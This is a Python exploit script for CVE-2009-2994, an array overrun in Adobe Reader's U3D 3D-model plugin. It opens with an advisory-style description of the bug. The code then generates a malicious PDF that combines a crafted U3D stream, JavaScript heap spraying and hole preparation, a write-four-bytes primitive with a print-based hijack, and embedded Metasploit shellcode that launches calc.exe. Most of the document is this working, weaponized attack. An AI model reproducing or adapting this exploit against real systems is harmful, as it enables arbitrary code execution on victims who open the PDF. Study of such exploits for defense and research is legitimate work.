622 lines
No EOL
22 KiB
Python
Executable file
622 lines
No EOL
22 KiB
Python
Executable file
##Copyright (c) 2009, Felipe Andres Manzano <felipe.andres.manzano@gmail.com>
|
|
##All rights reserved.
|
|
##
|
|
##Redistribution and use in source and binary forms, with or without
|
|
##modification, are permitted provided that the following conditions are met:
|
|
## * Redistributions of source code must retain the above copyright
|
|
## notice, this list of conditions and the following disclaimer.
|
|
## * Redistributions in binary form must reproduce the above copyright
|
|
## notice, this list of conditions and the following disclaimer in the
|
|
## documentation and/or other materials provided with the distribution.
|
|
## * Neither the name of the Felipe Andres Manzano nor the
|
|
## names of its contributors may be used to endorse or promote products
|
|
## derived from this software without specific prior written permission.
|
|
##
|
|
##THIS SOFTWARE IS PROVIDED BY Felipe Andres Manzano ''AS IS'' AND ANY
|
|
##EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
|
|
##WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
|
|
##DISCLAIMED. IN NO EVENT SHALL <copyright holder> BE LIABLE FOR ANY
|
|
##DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
|
|
##(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
|
|
##LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
|
|
##ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
|
|
##(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
|
|
##SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
|
|
|
##########################################################################
|
|
#### Felipe Andres Manzano * felipe.andres.manzano@gmail.com ####
|
|
##########################################################################
|
|
_doc_ = '''
|
|
Title: U3D CLODProgressiveMeshDeclaration initialization array overrun.
|
|
Product: Adobe Acrobat Reader (also Right Hemisphere Deep Exploration and others)
|
|
Version: 7.x, 8.x, 9.x
|
|
Product Homepage: www.adobe.com
|
|
Binary affected: */cygdrive/c/Program Files/Adobe/Reader 9.0/Reader/plug_ins3d/3difr.x3d
|
|
Binary Version: Adobe Reader 9.1.3
|
|
Binary MD5: 3c9b7a410047cbf5edcd229b0f0f62a5
|
|
CVE: CVE-2009-2994
|
|
|
|
Configuration Requirements
|
|
-----------------------------------------
|
|
Default
|
|
|
|
Vulnerability Requirements
|
|
-----------------------------------------
|
|
None
|
|
|
|
Vulnerability Description
|
|
-----------------------------------------
|
|
Universal 3D (U3D) is a compressed file format standard for 3D computer
|
|
graphics data.
|
|
Right Hemisphere has plugged funtionality for managing this format in a
|
|
bunch of their products. Also since version 7 Acrobat Reader is shipped
|
|
with a default plugin that supports this format as a form of interactive
|
|
annotation for PDFs.
|
|
Apparently, Adobe's provider of this technology is RH...
|
|
|
|
grep -R "Right Hemisphere" /opt/Adobe/
|
|
Binary file /opt/Adobe/Reader8/Reader/intellinux/plug_ins3d/3difr.x3d matches
|
|
|
|
|
|
When U3D CLODMeshDeclaration (blocktype: 0xFFFFFF31) is parsed by Adobe
|
|
Acrobat Reader, the U3D plugin will read two unvalidated 32 bit
|
|
integers, N and M. N is the length of an array of 20 bytes long
|
|
structures. But, M structures of that fresh array will be processed
|
|
taking uninitialized pointers from memory and writing arbitrary values
|
|
to the memory pointed by them.
|
|
|
|
More preciselly, in the U3D file the CLODMeshDeclaration box the
|
|
*positionCount* field (see #9.6.1.1.3.3) defines the length of the array
|
|
and the field *minimalResolution* determines how much of the array is
|
|
procesed. As stated before, if *minimalResolution* happens to be bigger than
|
|
*positionCount* then uninitialized off limits structures will be procesed.
|
|
|
|
|
|
|
|
Explotation:
|
|
============
|
|
*** Standalone and activeX reader tested in XPSP3 ***
|
|
|
|
As we control the size of the over-used array and how much we'll overuse
|
|
it, an outline of the exploitation may have this form...
|
|
|
|
- Choose a convenient not heavily used size for the array like 6500x20
|
|
- Spray the mem with a lot of 6500x20 controled chunks
|
|
- Free one of those in the middle so we have some amount of confidence
|
|
that the freed chunk will be followed by controled data.
|
|
- Control the data following the array that will be overrunned and the
|
|
dereferenced structure.
|
|
- Use the normal program behavior that takes pointers and data from the
|
|
now controled structure and make the write4bytes primitive.
|
|
- Use the write4bytes primitive and some more spray to do the print trick(tm)
|
|
|
|
Much more detailed doc inlined in the PoC...
|
|
|
|
Note:
|
|
Same bug was confirmed in RH Deep Exploration 5.5 (CAD Edition).
|
|
Other products from the firm may be affected. Notably this may affect
|
|
their free 3d viewer that enable the publishing of embedded 3d models
|
|
into MS Office products.
|
|
|
|
REFERENCES
|
|
==========
|
|
http://en.wikipedia.org/wiki/Universal_3D
|
|
http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-363%204th%20edition.pdf
|
|
http://www.adobe.com/devnet/acrobat3d/pdfs/U3DElements.pdf
|
|
http://www.ucon-conference.org/materials/2009/HackingPDFReaders-uCon-2009.pdf
|
|
|
|
Vulnerability WorkAround (if possible)
|
|
-----------------------------------------
|
|
For adobe bug.. delete the plugin.
|
|
|
|
|
|
'''
|
|
|
|
import os
|
|
import zlib
|
|
import sys
|
|
import struct
|
|
|
|
#For constructing a minimal pdf file
|
|
class PDFObject:
|
|
def __init__(self):
|
|
self.n=None
|
|
self.v=None
|
|
|
|
def __str__(self):
|
|
raise "Fail"
|
|
|
|
class PDFStream(PDFObject):
|
|
def __init__(self, dict,stream):
|
|
PDFObject.__init__(self)
|
|
dict.add('Length', len(stream))
|
|
self.dict=dict
|
|
self.stream=stream
|
|
|
|
def __str__(self):
|
|
s=""
|
|
s+=self.dict.__str__()
|
|
s+="\nstream\n"
|
|
s+=self.stream
|
|
s+="\nendstream"
|
|
return s
|
|
|
|
class PDFArray(PDFObject):
|
|
def __init__(self,s):
|
|
PDFObject.__init__(self)
|
|
self.s=s
|
|
def __str__(self):
|
|
return "[%s]"%(" ".join([ o.__str__() for o in self.s]))
|
|
|
|
|
|
class PDFDict(PDFObject):
|
|
def __init__(self):
|
|
PDFObject.__init__(self)
|
|
self.dict = []
|
|
|
|
def add(self,name,obj):
|
|
self.dict.append((name,obj))
|
|
|
|
def __str__(self):
|
|
s="<<"
|
|
for name,obj in self.dict:
|
|
s+="/%s %s "%(name,obj)
|
|
s+=">>"
|
|
return s
|
|
|
|
class PDFName(PDFObject):
|
|
def __init__(self,s):
|
|
PDFObject.__init__(self)
|
|
self.s=s
|
|
def __str__(self):
|
|
return "/%s"%self.s
|
|
|
|
class PDFString(PDFObject):
|
|
def __init__(self,s):
|
|
PDFObject.__init__(self)
|
|
self.s=s
|
|
|
|
def __str__(self):
|
|
return "(%s)"%self.s
|
|
|
|
class PDFHexString(PDFObject):
|
|
def __init__(self,s):
|
|
PDFObject.__init__(self)
|
|
self.s=s
|
|
|
|
def __str__(self):
|
|
return "<" + "".join(["%02x"%ord(c) for c in self.s]) + ">"
|
|
|
|
class PDFOctalString(PDFObject):
|
|
def __init__(self,s):
|
|
PDFObject.__init__(self)
|
|
self.s="".join(["\\%03o"%ord(c) for c in s])
|
|
|
|
def __str__(self):
|
|
return "(%s)"%self.s
|
|
|
|
class PDFNum(PDFObject):
|
|
def __init__(self,s):
|
|
PDFObject.__init__(self)
|
|
self.s=s
|
|
|
|
def __str__(self):
|
|
return "%s"%self.s
|
|
|
|
class PDFRef(PDFObject):
|
|
def __init__(self,obj):
|
|
PDFObject.__init__(self)
|
|
self.obj=[obj]
|
|
def __str__(self):
|
|
return "%d %d R"%(self.obj[0].n,self.obj[0].v)
|
|
|
|
class PDFNull(PDFObject):
|
|
def __init__(self):
|
|
PDFObject.__init__(self)
|
|
|
|
def __str__(self):
|
|
return "null"
|
|
|
|
|
|
class PDFDoc():
|
|
def __init__(self):
|
|
self.objs=[]
|
|
|
|
def setRoot(self,root):
|
|
self.root=root
|
|
|
|
def _add(self,obj):
|
|
obj.v=0
|
|
obj.n=1+len(self.objs)
|
|
self.objs.append(obj)
|
|
|
|
def add(self,obj):
|
|
if type(obj) != type([]):
|
|
self._add(obj);
|
|
else:
|
|
for o in obj:
|
|
self._add(o)
|
|
|
|
def _header(self):
|
|
return "%PDF-1.7\n"
|
|
|
|
def __str__(self):
|
|
doc1 = self._header()
|
|
xref = {}
|
|
for obj in self.objs:
|
|
xref[obj.n] = len(doc1)
|
|
doc1+="%d %d obj\n"%(obj.n,obj.v)
|
|
doc1+=obj.__str__()
|
|
doc1+="\nendobj\n"
|
|
posxref=len(doc1)
|
|
doc1+="xref\n"
|
|
doc1+="0 %d\n"%(len(self.objs)+1)
|
|
doc1+="0000000000 65535 f\n"
|
|
for xr in xref.keys():
|
|
doc1+= "%010d %05d n\n"%(xref[xr],0)
|
|
doc1+="trailer\n"
|
|
trailer = PDFDict()
|
|
trailer.add("Size",len(self.objs))
|
|
trailer.add("Root",PDFRef(self.root))
|
|
doc1+=trailer.__str__()
|
|
doc1+="\nstartxref\n%d\n"%posxref
|
|
doc1+="%%EOF\n\n"
|
|
|
|
return doc1
|
|
|
|
def getU3D(size):
|
|
#Bug marked u3d file
|
|
u3d = ""
|
|
u3d += "536f727279206d616e2c206a757374206b696c6c696e6720736f6d6520736b696469657300"
|
|
u3d += "55334400180000000000000000010000000000002400000064010000000000006a00000014"
|
|
u3d += "ffffffe40000000000000007005468654d65736801000000000000005050500100000031ff"
|
|
u3d += "ffff710000004b00000007005468654d657368000000000000000001000000595858580400"
|
|
u3d += "0000000000000000000000000000010000000000000000000000000000005b5858585c5858"
|
|
u3d += "582c0100002c0100002c010000000000000000000000000000000000000000000000000000"
|
|
u3d += "000000000000000000000000505050010000000600617574686f7201000000370000004665"
|
|
u3d += "6c69706520416e64726573204d616e7a616e6f203c66656c6970652e616e647265732e6d61"
|
|
u3d += "6e7a616e6f40676d61696c2e636f6d3e503cffffff410000000000000007005468654d6573"
|
|
u3d += "68000000000000000000000000000000000100000001000000010000000100000001000000"
|
|
u3d += "0100000001000000010000000100000001000000505050"
|
|
|
|
u3dstr = u3d.decode('hex')
|
|
#see 9.6.1.1.4 CLOD Description
|
|
u3dstr = u3dstr.replace(struct.pack("<L",0x58585859),struct.pack("<L",size)) #9.6.1.1.3.3 U32: Position Count
|
|
u3dstr = u3dstr.replace(struct.pack("<L",0x5858585b),struct.pack("<L",size+2)) #minimalResolution
|
|
u3dstr = u3dstr.replace(struct.pack("<L",0x5858585c),struct.pack("<L",size+3)) #finalMaximumResolution, this just need to be bigger than the last one.
|
|
return u3dstr
|
|
|
|
|
|
##############################MAIN###################################
|
|
class PDFU3DclodMESHDeclarationResolutionsBug:
|
|
#Escaping the escaping hell
|
|
def _toJS(self, s):
|
|
if type(s) in set([long, int]) :
|
|
s = struct.pack("<L",s)
|
|
if len(s) % 2 != 0:
|
|
raise "Err! Should be even number of chars"
|
|
r = ""
|
|
for i in range (0,len(s)/2):
|
|
r += "%u"+ "".join([ "%02x%02x"%(ord(s[i*2+1]),ord(s[i*2]))])
|
|
return "unescape(\""+r+"\")"
|
|
|
|
def _generateJS(self):
|
|
js = '''
|
|
function prepareHoles(slide_size){
|
|
var size = 1000;
|
|
var x = new Array(size);
|
|
var hole = %%hole%%;
|
|
/*
|
|
* TODO: to gain 0.0000000001% more reliability pad it with
|
|
* a far jump to shellcode instead of PPPPP..
|
|
*/
|
|
var pad = unescape("%u5858");
|
|
while (pad.length <= slide_size/2 - hole.length)
|
|
pad += pad;
|
|
|
|
for (i=0; i < size; i+=1) {
|
|
id = ""+i;
|
|
x[i]=hole + pad.substring(0,slide_size/2-hole.length);
|
|
}
|
|
|
|
/* Intermitently free half of the array & garbageCollect */
|
|
for (j=0;j<100;j++)
|
|
for (i=size/2; i < size-2; i+=2){
|
|
x[i]=null;
|
|
x[i]=pad.substring(0,0x10000/2 )+"A";
|
|
x[i]=null;
|
|
}
|
|
return x;
|
|
}
|
|
function prepareMemory(size){
|
|
var mini_slide_size = 0x1000;
|
|
var slide_size = 0x100000;
|
|
var x = new Array(size);
|
|
|
|
|
|
var pad = unescape("%ucccc");
|
|
while (pad.length <= 32 )
|
|
pad += pad;
|
|
|
|
/* Bunch of nops */
|
|
var nops = unescape("%u9090");
|
|
while (nops.length <= mini_slide_size/2 - nops.length)
|
|
nops += nops;
|
|
|
|
var shellcode = %%shellcode%%;
|
|
var pointers = %%pointers%%;
|
|
|
|
/*
|
|
* TODO: to gain 0.0000000001% more reliability add a short jump
|
|
* at the end of the firsts nops to jump over the pointers.
|
|
* Note that the first nops of the big (0x10000) chunk will be
|
|
* cuted off
|
|
*
|
|
* mini_slide_size len minichunk. (Always 0x1000 aligned)
|
|
*/
|
|
var chunk = nops.substring(0,32/2) +
|
|
pointers +
|
|
nops.substring(0,mini_slide_size/2-pointers.length
|
|
- shellcode.length - 32) +
|
|
shellcode +
|
|
pad.substring(0,32/2);
|
|
chunk=chunk.substring(0,mini_slide_size/2);
|
|
/*
|
|
* slide_size len minichunk. (Always 0x1000 aligned)
|
|
*/
|
|
while (chunk.length <= slide_size/2)
|
|
chunk += chunk;
|
|
|
|
for (i=0; i < size; i+=1) {
|
|
/* Debugging chunk id */
|
|
id = ""+i;
|
|
/* we cut the first bytes for better aligment */
|
|
x[i]=chunk.substring(16,slide_size/2 -32-id.length)+id;
|
|
};
|
|
return x;
|
|
}
|
|
|
|
/*
|
|
* Fill the memory with all needed chunks
|
|
*/
|
|
var mem = prepareMemory(200);
|
|
/*
|
|
* Prepare the interleaved holes
|
|
*/
|
|
var holes = prepareHoles(6500);
|
|
/* Advance to the last page */
|
|
for (i=0;i<2;i++)
|
|
this.pageNum++;
|
|
|
|
'''
|
|
## PREPAREHOLES:
|
|
## We will construct 6500*20 bytes long chunks starting like this
|
|
## |0 |6 |8 |C |24 |size
|
|
## |00000... |0100|20100190|0000... | ......pad...... |
|
|
## \ \
|
|
## \ \ -Pointer: to controlled data
|
|
## \ -Flag: must be 1
|
|
## -Adobe will handle this ragged structure if the Flag is on.
|
|
## -Adobe will get 'what to write where' from the memory pointed
|
|
## by our supplied Pointer.
|
|
##
|
|
## then allocate a bunch of those ..
|
|
## .. | chunk | chunk | chunk | chunck | chunk | chunck | chunck | ..
|
|
## |XXXXXXX|XXXXXXX|XXXXXXX|XXXXXXXX|XXXXXXX|XXXXXXXX|XXXXXXXX|
|
|
##
|
|
## and then free some of them...
|
|
## .. | chunk | free | chunk | free | chunk | free | chunck | ..
|
|
## |XXXXXXX| |XXXXXXX| |XXXXXXX| |XXXXXXXX|
|
|
##
|
|
## This way controlling when the next 6500*20 malloc will be
|
|
## followed with. We freed more than one hole so it became tolerant
|
|
## to some degree of malloc/free trace noise.
|
|
## Note the 6500 is arbitrary it should be a fairly unused chunk size
|
|
## not big enough to cause a different type of allocation.
|
|
## Also as we don't need to reference it from anywhere we don't care
|
|
## where this hole layout is placed in memory.
|
|
js = js.replace("%%hole%%",
|
|
self._toJS("\x00"*6+
|
|
struct.pack("<H",1)+
|
|
struct.pack("<L",0x09011020)+
|
|
"\x00"*24))
|
|
## PREPAREMEMORY:
|
|
## In the next technique we make a big-chunk of 0x10000 bytes
|
|
## repeating a 0x1000 bytes long mini-chunk of controled data.
|
|
## Big-chunks are always allocated aligned to 0x1000. And if we
|
|
## allocate a fair amount of big-chuncks (XPSPx) we'll be confident
|
|
## Any 0x1000 aligned 0x1000 bytes from 0x09000000 to 0x0a000000
|
|
## will have our mini chunk
|
|
##
|
|
## A mini-chunk will have this look
|
|
##
|
|
## |0 |10 |54 |? |0xff0 |0x1000
|
|
## |00000... | POINTERS | nops | shellcode | pad |
|
|
##
|
|
## So we control what is in 0x09XXXXXX. shellcode will be at 0x09XXX054+
|
|
## But we use 0x09011064.
|
|
## POINTERS looks like this:
|
|
## ...
|
|
js = js.replace("%%pointers%%",
|
|
self._toJS(struct.pack("<L",0x0)+
|
|
## where to write
|
|
struct.pack("<L",0x7c49fb34/4)+
|
|
## must be greater tan 5 and less than x for getting us where we want
|
|
struct.pack("<L",0x6)+
|
|
## what to write
|
|
struct.pack("<L",0x09011030)+
|
|
## autopointer for print magic(tm)
|
|
struct.pack("<L",0x09011034)+
|
|
## function pointers for print magic(tm)
|
|
## pointing to our shellcode
|
|
struct.pack("<L",0x09011064)*12))
|
|
js = js.replace("%%shellcode%%",self._toJS(self.shellcode) +
|
|
"\xcc" * (len(self.shellcode)%2))
|
|
return js
|
|
|
|
def mkDummy(self,pages,txt="PWNED!", js=""):
|
|
#font
|
|
font= PDFDict()
|
|
font.add("Subtype", PDFName("Type1"))
|
|
font.add("Name", PDFName("F1"))
|
|
font.add("BaseFont", PDFName("Helvetica"))
|
|
|
|
fontname = PDFDict()
|
|
fontname.add("F1",font)
|
|
#resources
|
|
resources = PDFDict()
|
|
resources.add("Font",fontname)
|
|
|
|
#contents
|
|
contents= PDFStream(PDFDict(), '''BT /F1 24 Tf 240 700 Td (%s) Tj ET'''%txt)
|
|
|
|
#The pdf page
|
|
page = PDFDict()
|
|
page.add('Type', '/Page')
|
|
page.add('Parent', PDFRef(pages))
|
|
page.add('Resources', resources)
|
|
page.add('Contents', PDFRef(contents))
|
|
|
|
#JavaScriptSeek
|
|
if len(js) != 0:
|
|
actionJSSeek = PDFDict()
|
|
actionJSSeek.add("S", PDFName("JavaScript"))
|
|
actionJSSeek.add("JS", PDFHexString(js))
|
|
self.doc.add(actionJSSeek)
|
|
page.add('AA', '<< /O '+PDFRef(actionJSSeek).__str__()+'>>')
|
|
|
|
self.doc.add(contents)
|
|
self.doc.add(page)
|
|
|
|
return PDFRef(page)
|
|
|
|
def mkCrash(self,pages,txt="PWNED!", js=""):
|
|
#font
|
|
font= PDFDict()
|
|
font.add("Subtype", PDFName("Type1"))
|
|
font.add("Name", PDFName("F1"))
|
|
font.add("BaseFont", PDFName("Helvetica"))
|
|
|
|
fontname = PDFDict()
|
|
fontname.add("F1",font)
|
|
#resources
|
|
resources = PDFDict()
|
|
resources.add("Font",fontname)
|
|
|
|
#contents
|
|
contents= PDFStream(PDFDict(), '''BT /F1 24 Tf 240 700 Td (%s) Tj ET'''%txt)
|
|
|
|
#The pdf page
|
|
page = PDFDict()
|
|
page.add('Type', '/Page')
|
|
page.add('Parent', PDFRef(pages))
|
|
page.add('Resources', resources)
|
|
page.add('Contents', PDFRef(contents))
|
|
|
|
#JavaScriptSeek
|
|
if len(js) != 0:
|
|
actionJSSeek = PDFDict()
|
|
actionJSSeek.add("S", PDFName("JavaScript"))
|
|
actionJSSeek.add("JS", PDFHexString(js))
|
|
self.doc.add(actionJSSeek)
|
|
page.add('AA', '<< /O '+PDFRef(actionJSSeek).__str__()+'>>')
|
|
|
|
str3d = PDFDict()
|
|
str3d.add("Type","/3D")
|
|
str3d.add("Subtype","/U3D")
|
|
|
|
str3d = PDFStream(str3d, getU3D(6500/20))
|
|
|
|
annot3d = PDFDict()
|
|
annot3d.add("Type",PDFName("Annot"))
|
|
annot3d.add("Subtype","/3D")
|
|
annot3d.add("Contents", "(a 3d model)")
|
|
annot3d.add("3DI", "false")
|
|
annot3d.add("3DA", "<< /A /PO /DIS /I >>")
|
|
annot3d.add('Rect', PDFArray([ 0, 0, 640, 480]))
|
|
annot3d.add("3DD",PDFRef(str3d))
|
|
annot3d.add("F", "7")
|
|
|
|
page.add('Annots', PDFArray([PDFRef(annot3d)]))
|
|
|
|
self.doc.add([str3d,annot3d,contents,page])
|
|
return PDFRef(page)
|
|
|
|
|
|
def __init__(self,scode):
|
|
#shellcode
|
|
self.shellcode=scode
|
|
|
|
self.doc= PDFDoc()
|
|
branding = PDFDict()
|
|
branding.add("Author", PDFString("Felipe Andres Manzano"))
|
|
branding.add("email", PDFString("felipe.andres.manzano@gmail.com"))
|
|
branding.add("twitter", PDFString("http://twitter.com/feliam"))
|
|
branding.add("web", PDFString("felipe.andres.manzano.googlepages.com"))
|
|
self.doc.add(branding)
|
|
|
|
#outline
|
|
outlines = PDFDict()
|
|
outlines.add("Type", PDFName("Outlines"))
|
|
outlines.add("Count",0)
|
|
|
|
#pages
|
|
pages = PDFDict()
|
|
pages.add("Type", PDFName("Pages"))
|
|
|
|
#catalog
|
|
catalog = PDFDict()
|
|
catalog.add("Type", PDFName("Catalog"))
|
|
catalog.add("Outlines", PDFRef(outlines))
|
|
catalog.add("Pages", PDFRef(pages))
|
|
|
|
|
|
#lets add those to doc just for showing up the Ref object.
|
|
self.doc.add([catalog,outlines,pages])
|
|
|
|
#crashing U3d annotated page
|
|
page = self.mkCrash(pages, js= '''this.print({bUI: true, bSilent: false, bShrinkToFit: false}); ''') #js for the print trick(tm)
|
|
#dummy Page
|
|
dummy1 = self.mkDummy(pages, js=self._generateJS())
|
|
dummy2 = self.mkDummy(pages)
|
|
|
|
pages.add('Count', PDFNum(3))
|
|
pages.add('Kids',PDFArray([dummy1,dummy2,page]))
|
|
|
|
#Set the pdf root
|
|
self.doc.setRoot(catalog)
|
|
|
|
|
|
def render(self):
|
|
#render it
|
|
return self.doc.__str__()
|
|
|
|
# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
|
|
w32Scode = "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x88"
|
|
w32Scode += "\x06\x28\x26\x83\xeb\xfc\xe2\xf4\x74\xee\x6c\x26\x88\x06\xa3\x63"
|
|
w32Scode += "\xb4\x8d\x54\x23\xf0\x07\xc7\xad\xc7\x1e\xa3\x79\xa8\x07\xc3\x6f"
|
|
w32Scode += "\x03\x32\xa3\x27\x66\x37\xe8\xbf\x24\x82\xe8\x52\x8f\xc7\xe2\x2b"
|
|
w32Scode += "\x89\xc4\xc3\xd2\xb3\x52\x0c\x22\xfd\xe3\xa3\x79\xac\x07\xc3\x40"
|
|
w32Scode += "\x03\x0a\x63\xad\xd7\x1a\x29\xcd\x03\x1a\xa3\x27\x63\x8f\x74\x02"
|
|
w32Scode += "\x8c\xc5\x19\xe6\xec\x8d\x68\x16\x0d\xc6\x50\x2a\x03\x46\x24\xad"
|
|
w32Scode += "\xf8\x1a\x85\xad\xe0\x0e\xc3\x2f\x03\x86\x98\x26\x88\x06\xa3\x4e"
|
|
w32Scode += "\xb4\x59\x19\xd0\xe8\x50\xa1\xde\x0b\xc6\x53\x76\xe0\x78\xf0\xc4"
|
|
w32Scode += "\xfb\x6e\xb0\xd8\x02\x08\x7f\xd9\x6f\x65\x49\x4a\xeb\x28\x4d\x5e"
|
|
w32Scode += "\xed\x06\x28\x26"
|
|
|
|
def getPDF():
|
|
fuzz = PDFU3DclodMESHDeclarationResolutionsBug(w32Scode)
|
|
return fuzz.render()
|
|
|
|
##Main
|
|
|
|
if __name__=="__main__":
|
|
print _doc_
|
|
if len(sys.argv) != 2:
|
|
print "Usage:\n\t"+sys.argv[0]+" filename.pdf\n"
|
|
else:
|
|
file(sys.argv[1],"w").write(getPDF())
|
|
##
|
|
##
|
|
## unrelated salut! to: Alfr3d, Juliano, JCF, David Batanero
|
|
## |